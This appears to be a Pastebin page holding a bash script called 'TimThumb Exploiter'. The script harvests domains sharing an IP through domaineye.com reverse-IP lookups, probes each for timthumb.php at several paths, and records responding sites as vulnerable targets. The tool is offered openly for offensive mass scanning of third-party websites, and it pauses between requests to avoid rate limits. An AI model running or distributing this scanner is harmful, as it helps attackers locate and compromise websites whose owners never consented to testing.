zerobyte-id

Exploiter TimThumb 1.x

Feb 5th, 2018
815
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Reverse ip with domaineye.com | TimThumb Exploiter
  3. # Coded By ZeroByte.ID
  4. # https://zerobyte.id - http://blog.zerobyte.id/
  5. function grab() {
  6.     ip=$(dig +short $1 | head -1);
  7.     see=$(timeout 10 curl -q -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" -s https://domaineye.com/reverse-ip/$ip);
  8.     timeout 10 curl -q -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" -s https://domaineye.com/reverse-ip/$ip | grep "<div id='column1' class='column'><a href =" | sed "s|<a href = 'https://domaineye.com/similar/|\n|g" | cut -d ">" -f 1 | cut -d "'" -f 1 | sed '1d' >> simpen_nofilter.tmp
  9.     echo "Grab $1 => $ip";
  10. }
  11. function timb() {
  12.     ### ADD EXPLOIT ###
  13.     echo $1"/timthumb.php" >> temp_timthumb.txt
  14.     echo $1"/admin/timthumb.php" >> temp_timthumb.txt
  15.     echo $1"/public/timthumb.php" >> temp_timthumb.txt
  16. }
  17. function cektim() {
  18.     target=$1;
  19.     cekti=$(timeout 5 curl -s --write-out %{http_code} -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" --output /dev/null $target);
  20.     if [[ $cekti =~ '200' ]] || [[ $cekti =~ '400' ]]; then
  21.         cektum=$(timeout 5 curl -s $target);
  22.         if [[ $cektum =~ 'no image specified' ]]; then
  23.             echo "[VULN] => $target";
  24.             echo "$target" >> vuln_timthumb.txt
  25.         else
  26.             echo "[BAD] $target";
  27.         fi
  28.     else
  29.         echo "[NOT FOUND]" $target;
  30.     fi
  31.  
  32. }
  33. cat << "ZERO"
  34.  _____              _           _         _     _
  35. |__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  36.   / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  37.  / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  38. /____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  39.                           |___/                  
  40. -------------------------------------------------
  41. --------------- TimThumb Exploiter --------------
  42. -------------------------------------------------
  43.  
  44. ZERO
  45. echo -n "Masukan list : "; read list
  46. for gudlo in $(cat $list); do
  47.     grab $gudlo;
  48. if [[ -z $see ]]; then
  49.     echo "STOP";
  50.     echo "WAITING FOR 10m"
  51.     sleep 10m
  52.     grab $gudlo
  53. fi
  54.     sleep 30s
  55. done
  56.  
  57. echo "FILTERING";
  58. sort simpen_nofilter.tmp | uniq >> simpen.lst
  59. sleep 0.5s
  60. echo "ADD LIST FOR TIMTHUMB";
  61. for adlist in $(cat simpen.lst); do
  62.     timb $adlist;
  63. done
  64. for target in $(cat temp_timthumb.txt); do
  65.     cektim $target;
  66. done
  67.  
  68. ### REMOVE TEMP ###
  69. rm simpen.lst temp_timthumb.txt simpen_nofilter.tmp -f
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×